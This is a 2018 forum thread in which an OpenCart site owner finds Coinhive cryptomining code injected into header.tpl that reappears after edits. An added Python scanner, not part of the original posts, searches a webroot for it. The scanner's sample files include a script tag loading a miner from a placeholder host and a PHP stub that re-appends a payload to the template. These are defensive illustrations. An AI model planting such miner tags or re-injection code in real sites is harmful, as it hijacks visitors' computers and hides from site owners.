Brocoiner!rfn trojan

Posted: Thu Oct 11, 2018 6:53 pm
by _imagine_
Hello guys,
I have been working on a new website the last few days and everything was going great, until yesterday. Suddenly, when I was viewing the front end of the website, I got a message that it is trying to connect to something identified as "Trojan:HTML/Brocoiner!rfn". Apparently this is a program that attaches itself to the website and proceeds to use its users' PCs to mine some sort of currency. There is a lot of info out there on how to remove it from a PC but none on where it might be hiding on a server. Weird thing is I haven't uploaded any new modules or themes on the FTP, only a few media files. However, neither my friends nor I got that antivirus message before yesterday. Sucuri SiteCheck doesn't seem to find anything wrong.

Re: Brocoiner!rfn trojan

Posted: Fri Oct 12, 2018 2:59 am
by IP_CAM
Weird thing is I haven't uploaded any new modules or themes
Are you talking about a problem related to some unknown yet OpenCart Version,
or is this about your regular Website and some Media-Files you added?
And did you check those Media Files first, to make sure they're clean?!
Ernie

Re: Brocoiner!rfn trojan

Posted: Sat Oct 13, 2018 12:03 am
by _imagine_
Hello,
This is a regular 2.3.0.2. I didn't check all the media files, but they were just pictures. Using Notepad++ I found unwanted code linked to coinhive in header.tpl, both in the default and my theme. I removed the code and people stopped getting a message, and the site stopped abusing my processor as soon as I open it.
However, there must still be something left, because as soon as I change anything on the site through the admin panel or through FTP the unwanted code is back in header.tpl. Anyway, this is how far I've gotten; I'll post here if I find a complete fix to the problem.
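
Added example, not part of the original posts: a Python sketch of the server-side search the post above describes, listing every template or script that contains the coinhive string and, separately, PHP files that both name header.tpl and call a file-writing function, which are candidates for whatever keeps restoring the code. The file-writing heuristic, the sample tree and the `miner.invalid` host are assumptions constructed for illustration.

```python
import os, re, tempfile

MARKER = re.compile(r"coinhive", re.I)   # string the poster found in header.tpl
WRITER = re.compile(r"\b(file_put_contents|fwrite|fputs)\s*\(", re.I)  # assumed heuristic
TEXT_EXT = (".tpl", ".php", ".js", ".html", ".twig")

def scan(root):
    """Return (injected, writers): files containing the marker with line numbers,
    and PHP files that both name header.tpl and call a file-writing function."""
    injected, writers = [], []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(TEXT_EXT):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            hits = [i for i, line in enumerate(text.splitlines(), 1) if MARKER.search(line)]
            if hits:
                injected.append((rel, hits))
            if name.lower().endswith(".php") and "header.tpl" in text and WRITER.search(text):
                writers.append(rel)
    return sorted(injected), sorted(writers)

def build_sample(root):
    """Constructed sample tree (not taken from the poster's server)."""
    files = {
        "catalog/view/theme/default/template/common/header.tpl":
            "<head>\n<script src=\"https://miner.invalid/coinhive.min.js\"></script>\n</head>\n",
        "catalog/view/theme/default/template/common/footer.tpl": "<footer></footer>\n",
        "image/cache/thumb.php":
            "<?php $t = DIR . 'header.tpl'; file_put_contents($t, $payload, FILE_APPEND);\n",
        "catalog/controller/common/header.php": "<?php // loads common/header\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        injected, writers = scan(tmp)
        for rel, lines in injected:
            print("marker:", rel, "lines", lines)
        for rel in writers:
            print("possible re-injector:", rel)
```

Run `scan()` against a downloaded copy of the webroot rather than the sample tree; a writer hit is only a lead to read by hand, since an encoded or remotely fetched payload would not match either pattern.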

Re: Brocoiner!rfn trojan

Posted: Sat Oct 13, 2018 1:32 am
by IP_CAM
Well, it might be a regular v.2.3.0.2, but you possibly added some Mods,
or else you use other Code like WordPress etc. on the same Server.
But without real Data, it's just filling useless topics...
Ernie